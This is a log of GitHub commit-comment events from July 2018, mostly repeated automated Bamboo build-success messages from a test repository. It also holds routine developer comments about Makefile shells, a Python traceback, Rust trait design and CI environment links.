{"id":"7939303798","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645823,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-09T18:21:39Z","updated_at":"2018-07-09T18:21:39Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:21:39Z"}
{"id":"7939304212","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645825,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-09T18:21:44Z","updated_at":"2018-07-09T18:21:44Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:21:44Z"}
{"id":"7939309461","type":"CommitCommentEvent","actor":{"login":"sboosali"},"repo":{"name":"sboosali/reflex-native"},"payload":{"comment":{"id":29645839,"position":null,"line":null,"path":null,"commit_id":"80ac7893645f3559c9a0d747f326b465d7323fec","created_at":"2018-07-09T18:22:44Z","updated_at":"2018-07-09T18:22:44Z","author_association":"OWNER","body":"Cool! To elaborate on what I mentioned in the issue: (\nhttps://github.com/reflex-frp/reflex-native/issues/2)\n\nWhen I ran `make`, I got an error like\n\n    error: /bin/sh: set pipefail ...\n\n(My shell is bash, but my make program must be defaulting to sh, or\nsomething).\n\nSince the makefile uses bash features, like the `pipefail` lines, it should\ndeclare that, via `SHELL=...` (But, I'm no expert on makefiles).\n\nOn Mon, Jul 9, 2018, 8:17 AM Ross MacLeod <notifications@github.com> wrote:\n\n> I'd be happy to upstream this if you can explain what it's there for!\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/sboosali/reflex-native/commit/80ac7893645f3559c9a0d747f326b465d7323fec#commitcomment-29643441>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACNoMYhGh5BjLJKUdo9_XS3LdOMI2qs6ks5uE3QjgaJpZM4VH5fv>\n> .\n>\n"}},"created_at":"2018-07-09T18:22:44Z"}
{"id":"7939309758","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645840,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-09T18:22:48Z","updated_at":"2018-07-09T18:22:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:22:48Z"}
{"id":"7939309853","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645841,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-09T18:22:49Z","updated_at":"2018-07-09T18:22:49Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:22:49Z"}
{"id":"7939310188","type":"CommitCommentEvent","actor":{"login":"chapmanb"},"repo":{"name":"chapmanb/cloudbiolinux"},"payload":{"comment":{"id":29645842,"position":12,"line":13,"path":"ggd-recipes/GRCh37/giab-NA12878-NA24385-somatic.yaml","commit_id":"b5a1699dd9b01258940b6b61447d72a18d9a88ce","created_at":"2018-07-09T18:22:53Z","updated_at":"2018-07-09T18:22:53Z","author_association":"OWNER","body":"Thanks much for the heads up and apologies about the issues. I changed this over to a single '/' so hopefully will work cleanly for you now. Much appreciated."}},"created_at":"2018-07-09T18:22:53Z"}
{"id":"7939310413","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645843,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-09T18:22:56Z","updated_at":"2018-07-09T18:22:56Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:22:56Z"}
{"id":"7939313426","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29645848,"position":null,"line":null,"path":null,"commit_id":"24ab3bab4d7bfe1924764480fd6d9661b4c3ed4e","created_at":"2018-07-09T18:23:31Z","updated_at":"2018-07-09T18:23:31Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.313`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/401889511) :tada:"}},"created_at":"2018-07-09T18:23:31Z"}
{"id":"7939314587","type":"CommitCommentEvent","actor":{"login":"Dridus"},"repo":{"name":"sboosali/reflex-native"},"payload":{"comment":{"id":29645852,"position":null,"line":null,"path":null,"commit_id":"80ac7893645f3559c9a0d747f326b465d7323fec","created_at":"2018-07-09T18:23:45Z","updated_at":"2018-07-09T18:23:45Z","author_association":"NONE","body":"ah well this is double good, as apparently my notification settings meant I didn't get the issue notification either hah. I'll fold in the PR, and thanks!"}},"created_at":"2018-07-09T18:23:45Z"}
{"id":"7939315448","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645854,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-09T18:23:55Z","updated_at":"2018-07-09T18:23:55Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:23:55Z"}
{"id":"7939315495","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29645855,"position":null,"line":null,"path":null,"commit_id":"59415d099d5e4de2aa78ba7479de54e06eff5e23","created_at":"2018-07-09T18:23:55Z","updated_at":"2018-07-09T18:23:55Z","author_association":"COLLABORATOR","body":"I have fixed it. This commit did have a bug. But after merging the \"new stack\" in, only running \"make\", even running \"make clean\" then \"make\" doesn't give out a reliable result. That's why this would have different result from local and remote."}},"created_at":"2018-07-09T18:23:55Z"}
{"id":"7939315801","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29645856,"position":null,"line":null,"path":null,"commit_id":"c448103942927916c7a5a9a394633492846abd36","created_at":"2018-07-09T18:23:59Z","updated_at":"2018-07-09T18:23:59Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-309](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-309).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-309-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-09T18:23:59Z"}
{"id":"7939315902","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645857,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-09T18:24:00Z","updated_at":"2018-07-09T18:24:00Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:24:00Z"}
{"id":"7939316344","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645859,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-09T18:24:06Z","updated_at":"2018-07-09T18:24:06Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:24:06Z"}
{"id":"7939316475","type":"CommitCommentEvent","actor":{"login":"Shyrka973"},"repo":{"name":"jeedom/plugin-blea"},"payload":{"comment":{"id":29645861,"position":null,"line":null,"path":null,"commit_id":"92142675b6901b4044cc9d2294eefd20f033887d","created_at":"2018-07-09T18:24:08Z","updated_at":"2018-07-09T18:24:08Z","author_association":"NONE","body":"Salut,\r\n\r\nJ'ai cette erreur:\r\nUnhandled exception in thread started by <function heartbeat_handler at 0x7fc8d87396e0>\r\nTraceback (most recent call last):\r\nFile \"/var/www/html/plugins/blea/resources/blead/blead.py\", line 307, in heartbeat_handler\r\nif(over):\r\nUnboundLocalError: local variable 'over' referenced before assignment\r\n\r\n@+"}},"created_at":"2018-07-09T18:24:08Z"}
{"id":"7939317156","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29645863,"position":null,"line":null,"path":null,"commit_id":"c448103942927916c7a5a9a394633492846abd36","created_at":"2018-07-09T18:24:15Z","updated_at":"2018-07-09T18:24:15Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-310](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-310).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-310-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-09T18:24:15Z"}
{"id":"7939317544","type":"CommitCommentEvent","actor":{"login":"xd1936"},"repo":{"name":"xd1936/inout2"},"payload":{"comment":{"id":29645864,"position":null,"line":null,"path":null,"commit_id":"f3230ad7e7e6cb4f28d514a7ef499bdd5f45674c","created_at":"2018-07-09T18:24:19Z","updated_at":"2018-07-09T18:24:19Z","author_association":"OWNER","body":"@babydux This code uses the [Google Apps Script Web App system](https://developers.google.com/apps-script/guides/web) to dynamically create the HTML page. Follow the instructions in [the setup section of the README](https://github.com/xd1936/inout2#setup) to get started."}},"created_at":"2018-07-09T18:24:19Z"}
{"id":"7939317871","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29645866,"position":null,"line":null,"path":null,"commit_id":"c048939df6606a7dd66380a03c37177868d39b99","created_at":"2018-07-09T18:24:23Z","updated_at":"2018-07-09T18:24:23Z","author_association":"COLLABORATOR","body":"Changes were made in 2422b929cf7aa55679ae9d23a3d1ec0269e83107."}},"created_at":"2018-07-09T18:24:23Z"}
{"id":"7939339677","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645930,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-09T18:28:44Z","updated_at":"2018-07-09T18:28:44Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:28:44Z"}
{"id":"7939340434","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645934,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-09T18:28:54Z","updated_at":"2018-07-09T18:28:54Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:28:54Z"}
{"id":"7939344071","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645939,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-09T18:29:38Z","updated_at":"2018-07-09T18:29:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:29:38Z"}
{"id":"7939345427","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645945,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-09T18:29:56Z","updated_at":"2018-07-09T18:29:56Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:29:56Z"}
{"id":"7939346208","type":"CommitCommentEvent","actor":{"login":"KimBanz"},"repo":{"name":"KimBanz/Programming-assignments"},"payload":{"comment":{"id":29645947,"position":null,"line":null,"path":null,"commit_id":"1c63364299b7f26f211f114de6da5c16317fddd7","created_at":"2018-07-09T18:30:06Z","updated_at":"2018-07-09T18:30:06Z","author_association":"OWNER","body":"[R_KCB_BirthdayTracker.docx](https://github.com/KimBanz/Programming-assignments/files/2177555/R_KCB_BirthdayTracker.docx)\r\n"}},"created_at":"2018-07-09T18:30:06Z"}
{"id":"7939346219","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645948,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-09T18:30:06Z","updated_at":"2018-07-09T18:30:06Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:30:06Z"}
{"id":"7939349933","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645956,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-09T18:30:48Z","updated_at":"2018-07-09T18:30:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:30:48Z"}
{"id":"7939351359","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645962,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-09T18:31:06Z","updated_at":"2018-07-09T18:31:06Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:31:06Z"}
{"id":"7939351979","type":"CommitCommentEvent","actor":{"login":"ncalexan"},"repo":{"name":"ncalexan/application-services"},"payload":{"comment":{"id":29645966,"position":null,"line":null,"path":null,"commit_id":"fce4e23222e00c41bc11f141e2b7fcf679b05a2d","created_at":"2018-07-09T18:31:13Z","updated_at":"2018-07-09T18:31:13Z","author_association":"OWNER","body":"> This trait was intentionally not generic. Making it generic like this prevents us from e.g. putting all the stores in an Vec we loop over to synchronize, unless they have the same error type, which is something we're likely to want to do if we have multiple stores.\r\n\r\nSure.  What do you propose instead?  Every real store implementation will have some kind of underlying IO error that needs to be massaged up and out.  I don't think one library type can contain them all (but maybe just saying they're all `Fail` implementers, or are `failure::Error` instances, is exactly what is best).  A consumer that wants to have an iterator of stores can (and must!) arrange them to have coherent error types, so this seems like a small restriction.  But I don't care how we solve this problem, I just need a solution, and this was the easier one to hand."}},"created_at":"2018-07-09T18:31:13Z"}
{"id":"7939352568","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645968,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-09T18:31:19Z","updated_at":"2018-07-09T18:31:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:31:19Z"}
{"id":"7939355263","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/zold"},"payload":{"comment":{"id":29645981,"position":null,"line":null,"path":null,"commit_id":"c6043c247408166b77830d50024473cab05cf071","created_at":"2018-07-09T18:31:50Z","updated_at":"2018-07-09T18:31:50Z","author_association":"COLLABORATOR","body":"Puzzle `357-e0152e73` discovered in   [`lib/zold/node/front.rb`](  https://github.com/zold-io/zold/blob/master/lib/zold/node/front.rb)   and submitted as #370. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-09T18:31:50Z"}
{"id":"7939355626","type":"CommitCommentEvent","actor":{"login":"morris-frank"},"repo":{"name":"morris-frank/buergerwerke-portal"},"payload":{"comment":{"id":29645982,"position":null,"line":null,"path":null,"commit_id":"9db75e40a5643c2ec63ccf4a41883d9553ee17f4","created_at":"2018-07-09T18:31:55Z","updated_at":"2018-07-09T18:31:55Z","author_association":"OWNER","body":"fixes #1 "}},"created_at":"2018-07-09T18:31:55Z"}
{"id":"7939355695","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645984,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-09T18:31:55Z","updated_at":"2018-07-09T18:31:55Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:31:55Z"}
